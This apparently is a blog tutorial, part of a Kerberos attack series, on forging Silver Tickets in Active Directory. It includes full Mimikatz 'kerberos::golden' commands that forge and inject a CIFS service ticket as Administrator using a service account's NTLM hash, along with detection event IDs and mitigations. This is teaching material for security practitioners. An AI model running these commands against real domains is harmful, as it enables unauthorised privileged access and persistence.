Forge service ticket
- Technique to maintain persistence in an already compromised domain
- A Silver Ticket is a forged Kerberos Ticket Granting Service (TGS) ticket
- A silver ticket attack involves compromising credentials and abusing the design of the Kerberos protocol.
- A silver ticket only allows an attacker for forge ticket-granting service (TGS) tickets for specific services.
- TGS tickets are encrypted with the password hash for the service – therefore, if an adversary steals the hash for a service account they can mint TGS tickets for that service.
- A attacker can create a Silver Ticket by cracking a computer account password and using that to create a fake authentication ticket. Kerberos allows services to log in without double-checking that their token is actually valid, which attackers have exploited to create Silver Tickets.
Kerberos Authentication Flow
- 1-Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC as an authenticator in the authentication ticket (TGT) request
- 2-KDC checks user information and creates TGT
- 3-The TGT is encrypted, delivered to the user. Only the KRBTGT in the domain can open and read TGT data.
- 4-The User presents the TGT to the DC when requesting a TGS ticket ,The DC opens the TGT & validates PAC checksum –> If the DC can open the ticket & the checksum check out, TGT = valid. The data in the TGT is effectively copied to create the TGS ticket.
- 5-The TGS is encrypted using the target service accounts’ NTLM password hash and sent to the user
- 6.The user connects to the server hosting the service & presents the TGS,The service opens the TGS ticket using its NTLM password hash.
Silver Ticket Attacks Work
Silver Ticket Attacks are post-exploitation attacks. That means that a threat actor must already have compromised a target system in the environment before they can generate a Kerberos Silver Ticket.
- 1-gather information about the domain, such as the domain name and domain security identifier (SID)
- 2-Obtain the DNS name under which the service principal name (SPN) for the targeted
- 3-Use Mimikatz to obtain the local NTLM password (or password hash) for the Kerberos service running on the compromised system
- 4-Use Mimikatz to forge a Kerberos TGS
kerberos::golden ##Name of the module (there is no Silver module) /User:Administrator ##Username for which the TGT is generated /domain :karim.net ## Domain Name /sid:S-1-5-21-750046758-1551849808-2392872301 ## SID of the domain /target : win10.karim.net ## Target machine /service: cifs The SPN name of service for which TGS is to be created /rc4:6f5b5acaf7433b3282ac22e21e62ff22 ## NTLM hash of the service account. /id:500 /groups:512 ## Optional User RID (default 500) and Group (default 513 512 520 518 519) /ptt ##Injects the ticket in current PowerShell process, no to save the ticket on disk /startoffset:0 (Optional)the start offset when the ticket is available (default 0) /endin:600 ##Optional ticket lifetime (default is 10 years) . The default AD setting is 10 hours = 600 minutes /renewmax:10080 ##Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800
512 ##Domain Admins 513 ##Domain Users 518 ##Schema Admins 519 ##Enterprise Admins 520 ##Group Policy Creator Owners
Getting a user’s SID
Create the silver ticket
kerberos::golden /user:Administrator /domain:karim.net /rc4:de26cce0356891a4a020e7c4957afc72 /target:domainAD.karim.com /sid:S-1-5-21-750046758-1551849808-2392872301 /service:CIFS /id:500 /ptt
List current tickets
save ticket in file
kerberos::golden /user:Administrator /domain:karim.net /rc4:de26cce0356891a4a020e7c4957afc72 /target:domainAD.karim.com /sid:S-1-5-21-750046758-1551849808-2392872301 /service:CIFS /id:500
Inject in memory using mimikatz
Access domain controller
- The normal process of obtaining a TGS ticket involves asking a domain controller to generate one.
- After the client proves their identity, the domain controller with reply with a TGS encrypted with the service account password.
- detecting silver tickets is only possible on the endpoint and involves examining TGS tickets for subtle signs of manipulation, such as: usernames that don’t exist, modified group memberships (added or removed)
- The Account Domain field is blank when it should be DOMAIN
- The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
- 4624 Account Logon
- 4634 Account Logoff
- 4672 Admin Logon
several mitigations exist that can make it harder for an adversary to compromise service account password hashes.
- Protect assets (especially the domain controller)
- Same mitigations as for kerberoastig apply
- Reduce administrative access to member workstations and servers to the least required.
- Remove end-user administrative privileges on member workstations.
- Adopt strong password hygiene practices for service accounts.
- Do not allow users to possess administrative privileges across security boundaries.
If a silver ticket is detected, several response actions can be taken:
- Activate the incident response process and alert the incident response team.
- Reset the password of the compromised service account.
I finished part 3 in Kerberos attacks today waite me in the next part.